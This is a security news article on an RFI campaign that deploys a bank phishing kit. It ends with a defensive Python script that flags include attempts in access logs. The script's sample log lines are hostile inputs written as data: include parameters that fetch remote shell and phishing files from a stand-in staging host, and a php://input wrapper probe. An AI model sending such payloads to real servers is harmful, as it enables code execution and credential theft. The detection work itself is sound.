Campaign Leverages RFI Attacks to Deploy Phishing Kits

A recently detected series of targeted attacks is attempting to exploit Remote File Inclusion (RFI) vulnerabilities to deploy phishing kits, Akamai has discovered. 

RFI attacks exploit file-inclusion functions that accept unvalidated, user-controlled input, letting an attacker point the application at a file hosted on a server they control. Most of these attacks target PHP, where include() and require() will fetch a URL when allow_url_include is enabled, but the same class of vulnerability can also be found in Java, ASP, and elsewhere.

Once an RFI attack succeeds, the server fetches the attacker-controlled remote file and executes its contents as if it were part of the application, and this is what was happening in the recently discovered attacks as well, Akamai’s Larry Cashdollar reveals.

RFI attacks, the security researcher explains, could also lead to code execution, Cross Site Scripting (XSS), Denial of Service (DoS), or sensitive information disclosure.

The security researcher observed the attack on his own website, where server logs revealed GET requests whose include parameters pointed to a remote text file, along with requests attempting to include a remote shell into the application running on the website.

The code in the text file was designed to check whether the server was vulnerable to RFI. If so, the contents of the $SERVER_ADMIN variable (the administrator email address configured in the web server, exposed to PHP as $_SERVER['SERVER_ADMIN']) would be sent back to the attacker.

The file also included a call to another external .txt file, which revealed some information about the attacker, such as their email address, the fact that they favor Portuguese for variable names ($assunto, Portuguese for “subject”), and confirmation that they are profiling servers (the code gathered which user the HTTP daemon runs as on the server, such as apache or root).

The researcher also noticed a request to a different text file from the same domain, which contained the necessary code to generate a phishing website targeting a well-known bank in the European Union.

“The reason for [using] text files is due to their ease of use. The text files can be remotely included into vulnerable PHP web pages via RFI and executed. However, they’re also easy to edit and manage, which gives the attacker a bit of flexibility,” the researcher notes. 

If the phishing kit is successfully deployed and users fall victim to it, harvested credentials are sent back to the attacker via email, as revealed by a configuration file that also included code for basic logging (counting the number of successful attacks vs. the number of page visits).

The investigation also led to the discovery of an HTML file used as a landing page that initiates the final step of the phishing campaign and redirects the victim to a secondary domain where the phishing kit targeting the EU bank is hosted.

“The RFI attempts recorded in my logs were tailored to the page being tested. If the website being targeted uses form_id= for example, then the requests will match that instead of the generic (and commonly used) page_id= or page=. This tells us the attacker is likely parsing the HTML, and examining the variables being sent via form to the backend,” Cashdollar notes. 

RFI also helps the attacker stay under the radar: tools exist to scan for websites that could be vulnerable, record them to a list, and then work through that list slowly. Unless the server admin is watching the logs, a successful attack can go unnoticed for a long time. Nothing ties the technique to phishing, either; the attacker could just as easily install a crypto miner or some other means of monetizing their access to the system instead of a phishing kit. 
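The practical check the preceding paragraphs point at is watching the access logs for include attempts, and two details from the article shape how that check has to work: the attacker tailors the parameter name to the target site (form_id= rather than page=), so matching on a fixed parameter list misses them, and the payload is fetched from a staging domain that recurs across requests. The following Python script is an added example, not Akamai’s or the article author’s code; the log lines are constructed in Apache combined format using RFC 5737 documentation addresses, and the staging host 203.0.113.99 and file names are invented for the demo. It inspects every query parameter of every request, decodes URL-encoded values, flags any value PHP’s include() would read from a URL or stream wrapper, records the classic trailing “?” trick, and then pivots on the staging host so that a slow, list-driven campaign shows up as one host hitting many pages from many source IPs.

```python
"""Flag Remote File Inclusion (RFI) attempts in combined-format access logs.

Added example, not code from Akamai or the article. All log lines below are
constructed for the demo; the IPs are RFC 5737 documentation addresses.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# PHP's include()/require() fetch these over the network when
# allow_url_include=On; the second group are PHP stream wrappers that get
# abused through the same unvalidated include parameter.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
WRAPPER_SCHEMES = {"php", "data", "expect", "phar"}

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SCHEME_RE = re.compile(r'^([a-z][a-z0-9+.\-]*):')

# Constructed sample: a benign request, a page= probe with the trailing "?"
# trick, a tailored form_id= probe, a URL-encoded variant, an FTP include,
# a legitimate redirect parameter that carries a URL without being RFI,
# and a php://input wrapper attempt.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2019:08:14:22 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Sep/2019:08:14:25 +0000] "GET /index.php?page=http://203.0.113.99/files/test.txt? HTTP/1.1" 200 402 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Sep/2019:08:15:01 +0000] "GET /contact.php?form_id=http://203.0.113.99/files/shell.txt HTTP/1.1" 200 811 "-" "curl/7.64.1"
198.51.100.4 - - [10/Sep/2019:08:15:05 +0000] "GET /contact.php?form_id=https%3A%2F%2F203.0.113.99%2Ffiles%2Fbank.txt HTTP/1.1" 200 9230 "-" "curl/7.64.1"
192.0.2.10 - - [10/Sep/2019:08:16:40 +0000] "GET /index.php?page=ftp://203.0.113.99/pub/kit.txt HTTP/1.1" 200 300 "-" "python-requests/2.22"
192.0.2.11 - - [10/Sep/2019:08:17:00 +0000] "GET /index.php?page=contact HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
192.0.2.12 - - [10/Sep/2019:08:17:30 +0000] "GET /redirect.php?url=https://example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.13 - - [10/Sep/2019:08:18:12 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 120 "-" "curl/7.64.1"
"""


def classify_value(value):
    """Return the scheme if a parameter value would make PHP's include() read
    from a URL or stream wrapper, otherwise None."""
    # parse_qsl already decoded once; decoding again catches %2525-style double encoding.
    decoded = unquote(value).strip().lower()
    m = SCHEME_RE.match(decoded)
    if not m:
        return None
    scheme = m.group(1)
    return scheme if scheme in REMOTE_SCHEMES | WRAPPER_SCHEMES else None


def find_rfi_attempts(log_text, ignore_params=frozenset()):
    """Scan every query parameter of every request, not just page= or page_id=,
    because the attacker tailors the parameter name to the target site.
    ignore_params: names that legitimately carry URLs (redirect targets etc.)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        target = urlsplit(m.group("target"))
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name in ignore_params:
                continue
            scheme = classify_value(value)
            if scheme is None:
                continue
            decoded = unquote(value)
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "page": target.path,
                "param": name,
                "scheme": scheme,
                # Host serving the included file (None for local PHP wrappers).
                "host": urlsplit(decoded).hostname if scheme in REMOTE_SCHEMES else None,
                # A trailing "?" turns whatever the app appends (e.g. ".php")
                # into a query string on the attacker's server, a classic RFI trick.
                "trailing_query": decoded.rstrip().endswith("?"),
                "status": int(m.group("status")),
                "ua": m.group("ua"),
            })
    return hits


def group_by_staging_host(hits):
    """Pivot on the host serving the included files: a slow, list-driven
    campaign shows up as one staging domain recurring across source IPs,
    target pages and parameter names."""
    by_host = {}
    for h in hits:
        if h["host"]:
            by_host.setdefault(h["host"], set()).add(h["ip"])
    return {host: sorted(ips) for host, ips in by_host.items()}


if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_LOG, ignore_params={"url"}):
        print(f'{h["ts"]} {h["ip"]} {h["page"]}?{h["param"]}= -> {h["scheme"]} '
              f'host={h["host"]} trailing_query={h["trailing_query"]} status={h["status"]}')
    print(group_by_staging_host(find_rfi_attempts(SAMPLE_LOG)))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. Two caveats: parameters that legitimately carry URLs (redirect targets, callback URLs) will be flagged unless passed in ignore_params, and a 200 status on a flagged request does not by itself prove the include succeeded, so the hits are leads for inspecting the page and the staging host, not a verdict.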

Related: Cybercriminals Using GitHub to Host Phishing Kits

Related: Phishers Serve Fake Login Pages via Google Translate

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
